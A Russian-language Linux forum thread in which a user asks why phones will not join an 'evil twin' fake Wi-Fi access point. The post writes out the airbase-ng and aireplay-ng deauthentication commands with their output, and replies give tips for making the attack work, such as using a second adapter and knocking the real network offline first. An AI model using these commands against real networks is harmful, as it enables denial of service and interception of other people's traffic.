LINUX.ORG.RU

Злой близнец «airbase-ng» Фейковая точка доступа

 airbase-ng, , ,


2

1

Всем доброго вечерочка. У меня дистрибутив Федора, в сфере linux не очень давно, поэтому что то не получается. Хочу создать фейковую точку доступа. Но почему то я не могу к фейку подключиться.

1) В мониторинг сетевую карту перевел

2) Просканирвал, нашел свою сеть

3) Cоздаю близнеца

 # airbase-ng -a 30:B5:C2:4E:AF:74 --essid "Sultan" -c 6 wlp0s20u1
15:30:47  Created tap interface at0
15:30:47  Trying to set MTU on at0 to 1500
15:30:47  Access Point with BSSID 30:B5:C2:4E:AF:74 started.

4) Роняю свою сеть 
 aireplay-ng -0 0 -a 30:B5:C2:4E:AF:74 wlp0s20u1
15:31:03  Waiting for beacon frame (BSSID: 30:B5:C2:4E:AF:74) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:31:03  Sending DeAuth to broadcast -- BSSID: [30:B5:C2:4E:AF:74]
15:31:04  Sending DeAuth to broadcast -- BSSID: [30:B5:C2:4E:AF:74]
15:31:04  Sending DeAuth to broadcast -- BSSID: [30:B5:C2:4E:AF:74]
15:31:05  Sending DeAuth to broadcast -- BSSID: [30:B5:C2:4E:AF:74]
15:31:05  Sending DeAuth to broadcast -- BSSID: [30:B5:C2:4E:AF:74]
....................................

5)Идет переподключение к моему фейку, но на телефоне у меня показывается только получение ip, но нет подключения

6)# airbase-ng -a 30:B5:C2:4E:AF:74 --essid "Sultan" -c 6 wlp0s20u1
15:30:47  Created tap interface at0
15:30:47  Trying to set MTU on at0 to 1500
15:30:47  Access Point with BSSID 30:B5:C2:4E:AF:74 started.
15:31:04  Client AC:EE:9E:21:40:03 associated (WPA2;CCMP) to ESSID: "Sultan"
15:31:57  Client AC:EE:9E:21:40:03 associated (unencrypted) to ESSID: "Sultan"
15:32:30  Client AC:EE:9E:21:40:03 associated (WPA2;CCMP) to ESSID: "Sultan"
15:32:43  Client AC:EE:9E:21:40:03 associated (unencrypted) to ESSID: "Sultan"
15:32:43  Client AC:EE:9E:21:40:03 associated (unencrypted) to ESSID: "Sultan"
15:32:43  Client AC:EE:9E:21:40:03 associated (unencrypted) to ESSID: "Sultan"
15:32:44  Client AC:EE:9E:21:40:03 associated (unencrypted) to ESSID: "Sultan"
15:32:52  Client AC:EE:9E:21:40:03 associated (unencrypted) to ESSID: "Sultan"
15:32:52  Client AC:EE:9E:21:40:03 associated (unencrypted) to ESSID: "Sultan"
15:33:27  Client AC:EE:9E:21:40:03 associated (unencrypted) to ESSID: "Sultan"
15:33:29  Client AC:EE:9E:21:40:03 associated (unencrypted) to ESSID: "Sultan"
15:33:29  Client AC:EE:9E:21:40:03 associated (unencrypted) to ESSID: "Sultan"


Почему не подключается? 


Последнее исправление: Ivan1990 (всего исправлений: 6)

Скорее всего клиент пытается установить зашифрованное соединение. Данное приложение, по всей видимости предназначено для клонирования точек без шифрования.

cyber_eagle
()

ТСу

" Отдел K лайкнул твой пост.."

sqq
()
Ответ на: комментарий от ukr_unix_user

Время сейчас неспокойное, главное вовроемя отреагировать, там разберёмся.

Deleted
()
Ответ на: комментарий от Deleted

Ну такое себе, вычислить по маку 2 минуты занимает, я ничего не скрываю. Так бы сидел и убирал цифры и буквы)

Ivan1990
() автор топика
Ответ на: комментарий от Ivan1990

Думал ещё не все знают.
Собственно по делу тебе тут уже ответили. Умные клиенты не подключаются куда попало.

Deleted
()

Либо ТС дурак, либо нужно спать ложиться. Сначала создаешь точку:

# airbase-ng -a 30:B5:C2:4E:AF:74 --essid «Sultan» -c 6 wlp0s20u1

А потом тем же адаптером эту же точку и роняешь?

aireplay-ng -0 0 -a 30:B5:C2:4E:AF:74 wlp0s20u1

Типо тебе 2 адаптера надо, как минимум. И сначала желательно ронять чужую, а уже потом на втором адаптере поднимать свою.

SHODAN
()
17 июня 2018 г.

Если решили проблему дайте знать, такая же фигня.

anonymous
()
Ответ на: комментарий от Harald

Благодаря долбаному шпионству от корпорации экс-добра, периодически включающему андроидам wi-fi, сканирующему точки и сливающему насканенное.

t184256 ★★★★★
()

получение ip

даю подсказку: кто раздаёт айпишник? коекакеры млин

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.